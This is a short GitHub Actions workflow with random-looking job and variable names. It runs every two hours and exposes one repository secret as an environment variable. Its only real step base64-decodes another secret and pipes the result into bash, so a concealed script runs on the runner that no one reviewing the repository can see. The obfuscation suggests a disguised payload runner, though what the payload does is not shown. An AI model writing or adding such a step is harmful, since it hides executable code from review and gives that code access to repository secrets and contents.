name: xgBeeW
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  RdThvvhrGmLJ:
    runs-on: ubuntu-latest
    env:
      UqGbmQrHx: ${{ secrets.gilcRbupbjiT }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.MpRXvzyTYjQD }}" | base64 -d | bash
